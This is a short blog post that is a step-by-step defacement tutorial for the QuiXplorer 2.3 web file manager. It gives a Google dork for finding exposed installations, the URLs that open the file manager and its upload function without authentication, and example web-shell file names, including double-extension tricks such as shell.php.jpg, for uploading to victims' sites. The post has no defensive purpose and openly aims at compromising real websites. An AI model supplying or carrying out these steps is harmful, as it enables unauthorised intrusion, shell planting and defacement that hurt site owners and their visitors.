"QuiXplorer 2.3" Upload shell and deface easily

open Google.com and type this dork
intitle:"QuiXplorer 2.3 - the QuiX project"

you'll see a lot of sites, some big websites are vuln on this
Vulnerablity

http://[localhost]/[path]/index.php?action=list&order=name&srt=yes

http://site.com/[xyz]/index.php?action=list&order=name&srt=yes

 after Going to this you will saw a file manager

you can upload your files here

find this edit file create file etc icons in page and click on last, its upload option

You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
after index.php?
example :

http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes

Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file

click On you file For view

"QuiXplorer 2.3" Upload shell and deface easily

Post a Comment

Pak Softwares Spot

"QuiXplorer 2.3" Upload shell and deface easily

Share to:

Next

Newer Post

Previous

Older Post

Post a Comment